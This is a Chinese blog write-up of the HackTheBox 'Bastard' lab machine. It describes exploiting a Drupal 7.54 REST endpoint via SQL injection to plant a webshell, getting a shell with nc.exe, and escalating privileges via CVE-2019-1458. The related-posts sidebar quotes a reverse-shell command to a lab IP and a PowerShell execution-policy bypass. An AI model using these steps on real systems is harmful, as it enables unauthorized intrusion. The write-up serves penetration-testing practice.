HTB-Bastard

已于 2023-04-10 17:12:07 修改
阅读量431 收藏 1
点赞数
分类专栏: HTB 文章标签: 其他
于 2023-04-07 17:30:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37370714/article/details/129994184
版权

HTB-Bastard

在这里插入图片描述

信息收集

在这里插入图片描述
在这里插入图片描述

80端口

一个欢迎界面以及一个登录功能。底部有Powered by Drupal
在这里插入图片描述
创建一个用户aster:aster@aster.com,会看到无法发送邮件的错误信息。

在这里插入图片描述
返回查看nmap结果

在这里插入图片描述
查看CHANGELOG.txt文件,获得Drupal版本为7.54。
在这里插入图片描述

INSTALL.mysql.txt也能访问不过只是安装使用mysql的文档,INSTALL.pgsql.txt则是pgsql的帮助文档。我们只选择需要的来列举出来。
在这里插入图片描述
robots.txt文件内容如下。

在这里插入图片描述

大部分内容都无法访问,去看看drupal 7.54有什么可以利用的呢。

在这里插入图片描述
虽然可以是易受攻击版本,但是攻击会失败。查看一下此利用的需要条件。
在这里插入图片描述
逐步排查,有问题的部分就是PHP_FUNC和TARGETURI两个地方。再次对目标进行目录扫描。
在这里插入图片描述

在这里插入图片描述
行吧,没有什么新的发现。继续查找利用的时候,看到了一个drupal的endpoint。
在这里插入图片描述

drupal的endpoint

在这里插入图片描述

下面我们需要找到endpoint的路径,但是扫描器貌似扫描不出来。尝试几个可能的搭配:/rest_endpoint、/endpoint、/rest。
在这里插入图片描述
运行会出现问题。

在这里插入图片描述
安装php-curl,sudo apt install php-curl
在这里插入图片描述
先看看能不能通过sql写入phpinfo。

在这里插入图片描述
可以。
在这里插入图片描述

那就写一个webshell吧。
在这里插入图片描述

在这里插入图片描述
此外他还给了我们session.json和user.json两个json文件。
在这里插入图片描述

在这里插入图片描述
user.json里面有sql注入出来的admin的信息。
在这里插入图片描述hashcat wiki上能找到对应的hash类型。
在这里插入图片描述

立足

不过我们都有webshell了,所以用不上admin的密码。上传nc.exe并运行获得shell。
在这里插入图片描述

提权

systeminfo查看操作系统有关信息。
在这里插入图片描述
搜索相关内核漏洞。CVE-2019-1458
在这里插入图片描述
配合上前面的nc.exe反弹system的shell。
在这里插入图片描述

永远是深夜有多好。
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[HTB]“Heist”靶机渗透详细思路
墨痕诉清风的博客
01-02 751
1.信息搜集2.寻找80端口信息泄漏的密码3.通过已知的用户枚举可能的用户名密码。4.寻找主机的其他用户5.5985端口的入侵以及拿shell6.找管理员操作进程,提取进程文件,拿到管理员密码,并拿shell。
HTB靶场系列】Bastard
Ms08067安全实验室
07-28 219
点击星标,即时接收最新推文#01实验信息靶机:10.10.10.9Kali:10.10.16.2#02实验过程靶机打开的端口很少,接下来扫描端口的详细信息根据信息可以得出靶机是IIS搭建的,网站有robots.txt里面有很多可用信息接下来 再对靶机进行 常用漏洞脚本扫描 以及 常见UDP端口扫描,没有什么出现其他的可用信息那么这里的突破口就主要就是80端口通过刚刚nmap的扫描结果得出靶机用的是...
oscp——HTB——Bastard
王嘟嘟的博客
05-20 543
0x00 前言 难度 入门1级 0x01 信息收集 0x02 Web——Webshell 这里访问之后看到是一个Drupal的站,Drupal的站在7.0可以直接直接getshell 使用脚本直接getshell 0x03 Webshell——Rootshell 传一个nc 上去然后反弹一个shell nc.exe -e cmd 10.10.14.6 1234 这里可以使用Sherlock先进行扫描。 powershell.exe -exec bypass -Command "& {Imp
HTB系列之七:Bastard
Ms08067安全实验室
12-13 584
这次挑战的是 HTB 的第7台靶机:Bastard技能收获:PHP UnserilaizeCMS Version IdentifyWindows privilege escalation...
HTB-oscplike-Bastard+Granny
m0_53302733的博客
04-05 1103
HTB-oscplike-Bastard+Granny Bastard medium难度的bastard 靶机IP 10.10.10.9 sudo nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.9 80/tcp open http Microsoft IIS httpd 7.5 135/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Win
HTB-Solutions
03-09
【标题】"HTB-Solutions" 提供的内容可能与网络安全平台 Hack The Box(HTB)有关,这通常指的是用户在该平台上完成的各种挑战的解决方案集。Hack The Box 是一个在线平台,让网络安全爱好者和专业人士可以通过解决...
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
my-htb-tools3
03-19
my-htb-tools3
HTB-writeups:此仓库包含HackTheBox的文章
05-01
【标题】"HTB-writeups:此仓库包含HackTheBox的文章" 这个标题表明这是一个与网络安全相关的资源库,特别是关于HackTheBox(HTB)的挑战和机器的解决过程记录。HackTheBox是一个在线平台,允许安全专家和爱好者通过...
渗透测试3:HTB之Resolute
d3f4ult的博客
01-18 7194
文章目录介绍前期准备工作 介绍 Hackthebox的resolute靶机操作系统为windows,之前没有接触过windows系统的渗透,不过在大佬的提示下还是拿到了flag。 通过此次渗透可以学习到: 1.rpcclinet命令的使用 2.enum4linux工具的使用 3.windows系统渗透大体思路。 4.nc.exe工具的使用 5.msfvenom工具的使用,进而接触到了veil,话说...
HTB系列】靶机Bitlab的渗透测试
大方子
01-23 2906
https://note.youdao.com/ynoteshare1/index.html?id=4af5cf2cde031f1bbd9dd5d434661fb9&type=note
No.53-HackTheBox-windows-Bastard-Walkthrough渗透学习
qq_34801745的博客
02-13 1006
** HackTheBox-windows-Bastard-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/6 靶机难度:中等(4.7/10) 靶机发布日期:2017年10月14日 靶机描述: Bastard is not overly challenging, however it requires some...
HTB Beep[Hack The Box HTB靶场]writeup系列5
重新启程
02-04 3489
本题是retire机器的第五台了 目录 0x00 靶场信息 0x01 信息搜集 0x02 业务探测 80端口主页:elastix freepbx 80端口mail业务:roundcube webmail 10000端口:webmin 0x03 漏洞分析 elastix roundcube webmin 0x03 web攻击 roundcube webmin elas...
QT属性动画--设置样式属性(其他属性)
lizequan的博客
03-02 5193
这里写自定义目录标题故事背景遇到的问题解决过程最终方法感悟 故事背景   最近在制作一个按钮切换的动画特效中接触了属性动画这部分内容,并由此产生了一些思考。 遇到的问题 解决过程 最终方法 感悟 ...
Volatile的其他特性
我想月薪过万的博客
03-03 3770
2.1 volatile总体概览 在上一节中,我们已经研究完了volatile可以实现并发下共享变量的可见性,volatile除了保证可见性外,volatile还具备如下一些突出的特性: volatile的原子性问题:volatile不能保证原子性操作 禁止指令重排序:volatile可以防止指令重排序操作 2.2 volatile不保证原子性 2.3 代码测试 package Ls; /** * 目标:研究Volatile的原子性操作 * <p> * 基本观点:V.
【安卓基础】Android直接通过路径来操作其他应用的私有目录,可以吗?
m0_48179608的博客
03-02 7512
在上篇文章[【安卓基础】一文搞懂Android历代版本文件访问权限变化](https://blog.csdn.net/m0_48179608/article/details/122838494)我们对同一个应用的的文件访问权限做了比较。 那么不同应用之间文件访问又有什么限制呢?我们准备分二到三篇文件来阐述。 这篇文章,主要来看下不同系统版本下,我们直接通过路径来访问其它应用的**内部存储、外部存储私有目录**,看看能不能访问以及不同系统版本的区别。
Silane-PEG-NHS,SIL-PEG-NHS,可以用来修饰蛋白质、多肽以及其他活性基团,NHS-PEG-Silane
qq_39152602的博客
03-03 3426
英文名称:Silane-PEG-NHS 中文名称:硅烷-聚乙二醇-活性酯 分子量:1k,2k,3.4k,5k,10k,20k(可按需定制) 质量控制:95%+ 存储条件:-20°C,避光,避湿 用 途:仅供科研实验使用,不用于诊治 外观: 固体或粘性液体,取决于分子量 注意事项:取用一定要干燥,避免频繁的溶解和冻干 溶解性:溶于大部分有机溶剂,如:DCM、DMF、DMSO、THF等等。在水中有很好的溶解性 取用:现配现用,将包装从冰箱中取出,置于干燥器中缓慢升至室温,打开瓶盖,取用。取用.
format htb
最新发布
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios and practice their skills in a safe and controlled environment. The format of HTB typically involves a series of machines or challenges that users need to exploit to gain root access or find flags. Participants can use various tools and techniques to solve the challenges and improve their knowledge of cybersecurity.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值